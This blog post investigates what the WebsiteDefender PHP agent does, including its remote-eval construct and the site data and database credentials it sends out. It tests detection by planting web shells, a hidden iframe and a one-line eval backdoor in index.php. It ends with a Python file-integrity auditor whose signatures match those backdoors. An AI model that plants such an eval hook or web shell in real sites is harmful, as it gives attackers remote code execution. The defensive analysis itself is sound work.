A few weeks ago I noticed that the WordPress plugin WP Security Scan advertises a related service, WebsiteDefender, for protecting sites. On the site, apart from the standard marketing shell, I found nothing really useful, but I was somewhat intrigued by the claim that the service operates in a revolutionary way, different from the existing ones. Google gave nothing useful about how the service actually works.
Historically, most people consider protection against attacks from the outside sufficient: SQL injection, XSS, LFI/RFI, CSRF and so on, while forgetting attacks on the web application's files. WAFs such as mod_security and PHPIDS are a vivid example of this.
That seems unfair to me, so I wanted to look at what the WebsiteDefender service can do, since by its description it should be able to protect web application files from modification.
You are offered to download an agent: a PHP file containing a whole set of encryption functions and ... this construct:
$success = @eval('?>'.$request->params);
The question of what this PHP code does arose even before downloading it, and after a quick look and finding such an interesting arsenal inside, there were even more questions. Although the company appears to be quite well known (Acunetix), it is unlikely anyone would want to put a pig in a poke on their website.
The support team's reply to my request to explain what their code does, and the results of my investigation of the service, are below the cut.
WebsiteDefender does not provide details of how it works
From the correspondence I will quote only the most important part.
Me: I just want to know what your PHP code does. Not common information such as 'protect website ...' but more technical details. What does it collect and send to your server, etc.? Because now it is a black box for me.
Support answer:
We don't provide specific details.
However, it's not possible to determine if you're a WordPress user account. Thus, the WSD agent is used to retrieve our website for analysis. We're analyzing what is there.
It turns out quite interesting: they provide a service to protect websites, but they do not disclose specific details of what their agent does. From the last answer it became clear only that something is collected and sent.
What the WebsiteDefender PHP agent receives and sends
After a couple of days I installed a DynDNS client on my home laptop, registered a test host, installed Apache, PHP, MySQL and WordPress, added logging of the agent's input and output data, and periodically checked the log.
Those interested can read the agent code themselves; it is simple. The most important thing is that, after all sorts of pre-execution checks, external PHP code sent by WebsiteDefender is executed. It turns out to be a sort of shell, used not to hack a site but to protect it.
The following data is collected and sent:
- The PHP version and the $_SERVER array
- The directory and file structure: a list of files with specified extensions (php, html, js, htaccess, ini, log, etc.), and then their SHA-1 hashes, modification dates and access rights
- Database connection settings: name, host, login and password
- Some short strings and their MD5 hashes, probably to check that the agent is working
Suppose you are not troubled by the fact that the service, in exchange for a promise to protect your website, requires you to install an agent through which any code can be run in the future.
I decided to check how quickly traces of a site compromise would be found:
- In different directories of the site I scattered an old Web Shell by oRb, both packed and as source code, and some ancient shell from Antichat
- In the WordPress theme footer I inserted an invisible iframe
- I edited index.php, adding
if ( $_REQUEST['evil'] == 1 ) { eval( '?>'. $_GET[ 'cmd' ] ); exit(); }
All changes were detected after 2 days, during the next full scan of the site files; before that the robot quietly received md5 hashes. Interestingly, the Web Shell by oRb in wp-admin was marked as a critical threat and identified by different patterns:
/wp-admin/network/wso2.php, pattern: eval($_POST['p1']
/wp-admin/includes/wso2_pack.php, pattern: <?php # Web Shell by oRb
The shell from Antichat was modestly listed among the new files. Most likely, self-made, non-distributed packed shells would likewise not be given critical status, although an executable PHP file is the first thing worth highlighting.
Instead of conclusions
Surely you never even had the thought of installing other people's scripts to protect your site. This post is for informational purposes only. I just want to use this example, which conveniently turned up, to show that you should not blindly rely on external services: to protect your web applications from modification of their files and from shell uploads, even a simple home-written file auditor will do. If desired, it can be written in a couple of hours, it has the reaction time you need, and it can restore files. Not to mention configuring specialized utilities on the server.
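As an added example (not code from the post or from WebsiteDefender), here is the kind of home-written file auditor the conclusion refers to. It inventories the same things the post says the agent collects (files with given extensions, their SHA-1 hashes, modification times and access rights), keeps a baseline outside the web root, reports added, removed and modified files, and runs the content signatures quoted in the post (the eval($_POST['p1'] and Web Shell by oRb templates, generalised to the index.php hook and the hidden iframe) over the changed files. The watched-extension set, signature names and the demo() site tree are assumptions constructed for illustration.

```python
import hashlib
import json
import os
import re
import shutil
import stat
import tempfile

# Extensions to inventory; mirrors the kinds of files the post says the agent
# lists (php, html, js, htaccess, ini, log). Assumed set, adjust per site.
WATCHED_EXT = {".php", ".html", ".js", ".htaccess", ".ini", ".log"}

# Content signatures: the first two are the detection templates quoted in the
# post, the last two generalise to the planted index.php hook and hidden iframe.
SIGNATURES = [
    ("eval-of-request-input", re.compile(r"eval\s*\(\s*\$_(?:POST|GET|REQUEST)\s*\[")),
    ("web-shell-by-orb-banner", re.compile(r"Web Shell by oRb")),
    ("eval-close-tag-trick", re.compile(r"eval\s*\(\s*['\"]\?>['\"]\s*\.")),
    ("hidden-iframe", re.compile(
        r"<iframe[^>]*(?:display\s*:\s*none|width\s*=\s*['\"]?0|height\s*=\s*['\"]?0)", re.I)),
]

def _is_watched(name):
    return name == ".htaccess" or os.path.splitext(name)[1].lower() in WATCHED_EXT

def sha1_of(path):
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def snapshot(root):
    """Return {relpath: {sha1, mtime, mode}} for every watched regular file under root."""
    result = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not _is_watched(name):
                continue
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):
                continue  # skip symlinks and special files
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            result[rel] = {"sha1": sha1_of(full), "mtime": int(st.st_mtime),
                           "mode": stat.S_IMODE(st.st_mode)}
    return result

def save_baseline(path, snap):
    with open(path, "w", encoding="utf-8") as f:
        json.dump(snap, f, indent=1, sort_keys=True)

def load_baseline(path):
    with open(path, encoding="utf-8") as f:
        return json.load(f)

def diff_snapshots(baseline, current):
    """Added/removed files, plus files whose content hash or permissions changed."""
    both = set(baseline) & set(current)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in both
                           if baseline[p]["sha1"] != current[p]["sha1"]
                           or baseline[p]["mode"] != current[p]["mode"]),
    }

def scan_content(root, relpaths, max_bytes=2_000_000):
    """Return {relpath: [signature names]} for changed files matching a signature."""
    hits = {}
    for rel in relpaths:
        try:
            with open(os.path.join(root, *rel.split("/")), "rb") as f:
                text = f.read(max_bytes).decode("utf-8", "replace")
        except OSError:
            continue
        matched = [name for name, rx in SIGNATURES if rx.search(text)]
        if matched:
            hits[rel] = matched
    return hits

def _write(root, rel, text):
    full = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w", encoding="utf-8") as f:
        f.write(text)

def demo():
    """Constructed mini site tree: take a baseline, plant changes like the post's, report."""
    root = tempfile.mkdtemp(prefix="wp-audit-")
    store = tempfile.mkdtemp(prefix="wp-audit-baseline-")  # baseline lives outside the web root
    try:
        _write(root, "index.php", "<?php require 'wp-blog-header.php';\n")
        _write(root, "wp-admin/admin.php", "<?php echo 'admin';\n")
        _write(root, ".htaccess", "RewriteEngine On\n")
        save_baseline(os.path.join(store, "baseline.json"), snapshot(root))
        # Planted changes (constructed samples, hook lines kept as PHP comments).
        _write(root, "index.php", "<?php\n// if ( $_REQUEST['evil'] == 1 ) { eval( '?>'. $_GET[ 'cmd' ] ); exit(); }\n"
                                  "require 'wp-blog-header.php';\n")
        _write(root, "wp-admin/network/wso2.php", "<?php # Web Shell by oRb\n// eval($_POST['p1']) marker line\n")
        _write(root, "footer.html", '<iframe src="http://example.invalid/" width="0" height="0"></iframe>\n')
        os.chmod(os.path.join(root, "wp-admin", "admin.php"), 0o777)  # permission change only
        os.remove(os.path.join(root, ".htaccess"))
        report = diff_snapshots(load_baseline(os.path.join(store, "baseline.json")), snapshot(root))
        report["signatures"] = scan_content(root, report["added"] + report["modified"])
        return report
    finally:
        shutil.rmtree(root, ignore_errors=True)
        shutil.rmtree(store, ignore_errors=True)

if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Run snapshot() once on a known-good checkout and save the baseline, then run it from cron and diff; because the baseline and the script live outside the document root and are not writable by the web server user, a web shell that lands on the site cannot silently update them. The scan runs only over changed files, so the signature step stays cheap even on large sites.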